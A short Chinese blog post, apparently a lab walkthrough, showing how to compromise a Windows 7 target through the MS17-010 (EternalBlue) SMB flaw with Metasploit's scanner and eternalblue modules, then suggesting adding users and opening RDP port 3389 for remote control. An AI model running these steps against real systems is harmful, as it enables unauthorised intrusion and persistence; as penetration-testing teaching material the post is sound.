手记

利用MS17-010漏洞拿下服务器

persist213
2019-03-13 09:03:56浏览 3996

MS17-010漏洞介绍

    MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。

影响版本

    Windows Vista、Windows Server 2003/2008/2012/2016、Windows XP、Windows 7、Windows 8.1、Windows 10

环境搭建

攻击机:kali2018.4

靶机:windows 7 sp1 X64

win7关闭防火墙

攻击过程

打开kali的msf,使用search命令搜索ms17-010

选择auxiliary/scanner/smb/smb_ms17_010

使用show options查看需要配置哪些选项

配置目标主机:set RHOSTS 192.168.1.2

使用exploit执行,确认(192.168.1.2)存在ms17-010漏洞

使用攻击模块exploit/windows/smb/ms17_010_eternalblue

查看需要配置的选项

设置目标地址

Exploit开始攻击

ok,到此已经拿下服务器权限,上图可见已经可以执行cmd命令,可以创建用户,开启3389端口然后远程控制等。

附加信息:我在慕课网上免费课程欢迎大家观看:web渗透测试入门

需要靶机的朋友加我qq:981139459

相关标签
安全
安全测试
5人推荐
随时随地看视频
慕课网APP

相关阅读

在 Ubuntu 上使用 SSL/TLS 搭建一个安全的 FTP 服务器
使用Nginx作为负载均衡器
四、redis系列之主从复制与哨兵机制
Asp.Net Core + Docker 搭建
Redis的复制是如何实现的?